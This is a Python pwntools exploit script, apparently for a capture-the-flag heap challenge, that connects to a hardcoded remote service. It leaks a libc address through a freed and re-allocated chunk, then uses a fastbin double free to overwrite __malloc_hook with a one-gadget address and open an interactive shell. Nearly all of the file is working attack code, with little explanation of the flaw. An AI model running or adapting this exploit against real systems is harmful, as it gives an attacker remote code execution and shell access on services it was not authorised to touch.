
from pwn import *
from LibcSearcher import *
def conn():
    """Load the target libc image and open the remote session.

    Sets the module globals ``Libc`` (the ELF that ``pwn`` uses for the
    ``__malloc_hook`` symbol lookup) and ``r`` (the pwntools tube every
    menu helper writes to). ``elf`` is declared global but never assigned;
    the local-process and binary lines are left commented out, presumably
    for offline runs.
    """
    global r, Libc, elf
    # r = process("./pwn112")
    Libc = ELF("./libc-2.23.so")
    r = remote("1.95.36.136", 2072)
    # elf = ELF("./pwn1")
def add(x, y):
    """Menu option 1: request an allocation in slot *x* of size *y*.

    Both values are sent as their decimal text on the global tube ``r``
    after the corresponding prompt.
    """
    choice = b"1"
    r.sendlineafter(b"choice:\n", choice)
    r.sendlineafter(b"index:\n", f"{x}".encode())
    r.sendlineafter(b"size:\n", f"{y}".encode())
def edit(x, y):
    """Menu option 3: write the bytes *y* into slot *x*.

    The length sent to the service is ``len(y)``, so *y* must already be a
    bytes object; it is forwarded unchanged on the global tube ``r``.
    """
    payload = y
    r.sendlineafter(b"choice:\n", b"3")
    r.sendlineafter(b"index:\n", f"{x}".encode())
    r.sendlineafter(b"length:\n", f"{len(payload)}".encode())
    r.sendlineafter(b"content:\n", payload)
def free(x):
    """Menu option 2: release slot *x* (index sent as decimal text on ``r``)."""
    index = f"{x}".encode()
    r.sendlineafter(b"choice:\n", b"2")
    r.sendlineafter(b"index:\n", index)
def show(x):
    """Menu option 4: ask the service to print slot *x*.

    Only sends the request; the caller reads the reply from ``r`` itself.
    """
    index = f"{x}".encode()
    r.sendlineafter(b"choice:\n", b"4")
    r.sendlineafter(b"index:\n", index)
def pwn():
    """Drive the menu through the fixed sequence of steps below.

    Relies on the globals ``r`` (tube) and ``Libc`` (libc ELF) that
    ``conn`` sets up. Every slot index, size and constant is the literal
    value from the original script; nothing is parameterised.
    """
    # Allocate two chunks, free the first, re-allocate it and print it;
    # the returned line (newline stripped) is read as an 8-byte value and
    # the constant 0x3c4b78 is subtracted to obtain ``libc``.
    add(0, 0x410)
    add(1, 0x10)
    free(0)
    add(0, 0x410)
    show(0)
    leaked = r.recvline()[:-1]
    libc = u64(leaked.ljust(8, b"\x00")) - 0x3c4b78
    print("libc>>>", hex(libc))

    # Three candidate offsets are listed; only the second one is used.
    one = [0x4527a, 0xf03a4, 0xf1247]
    onegadget = libc + one[1]

    # Two 0x68 allocations, frees in the order 0, 1, 0, one more
    # allocation, then slot 0 is overwritten with a pointer derived from
    # the __malloc_hook symbol address.
    for slot in (0, 1):
        add(slot, 0x68)
    for slot in (0, 1, 0):
        free(slot)
    add(0, 0x68)
    malloc = libc + Libc.symbols["__malloc_hook"]
    print("maloc>>>", hex(malloc))
    edit(0, p64(malloc - 0x23))

    # Three further 0x68 allocations, a write of 0x13 padding bytes plus
    # the chosen address into slot 0, and a final small allocation.
    for _ in range(3):
        add(0, 0x68)
    edit(0, b"a" * 0x13 + p64(onegadget))
    add(0, 0x10)
    # gdb.attach(r)
    r.interactive()
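if __name__ == "__main__":
    # Guard the entry point so that importing this module (for example to
    # reuse the menu wrappers) does not open the connection as a side
    # effect; running the file directly behaves exactly as before.
    conn()
    pwn()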